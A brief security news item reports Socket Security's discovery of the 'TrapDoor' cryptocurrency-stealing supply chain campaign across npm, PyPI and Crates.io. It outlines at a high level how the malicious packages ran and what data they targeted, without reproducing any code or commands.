TrapDoor Cryptocurrency Theft Campaign Spans npm, PyPI, and Crates.io, Involving Over 34 Malicious Packages

2026-05-25 09:53 Source： socket.dev Event types： Online/Update 、 Security/Hacker

According to research by security firm Socket Security, a cryptocurrency-stealing supply chain attack dubbed “TrapDoor” spans npm, PyPI, and Crates.io, involving over 34 malicious packages and 384 related versions and artifacts. The attack targets cryptocurrency, DeFi, Solana, Sui, Move, and AI developers. Attack samples can steal sensitive information including SSH keys, wallet data, AWS credentials, GitHub tokens, browser data, and environment variables. Specifically, npm packages execute the shared payload `trap-core.js` via the `postinstall` hook; PyPI packages execute remote JavaScript upon import; and Crates.io packages steal local keystores via `build.rs`. Socket has flagged all related packages as malicious and reported them to the respective package registries.

Related projects

Agentwood Studios AWS
Campaign
Socket
Solana SOL
Sui SUI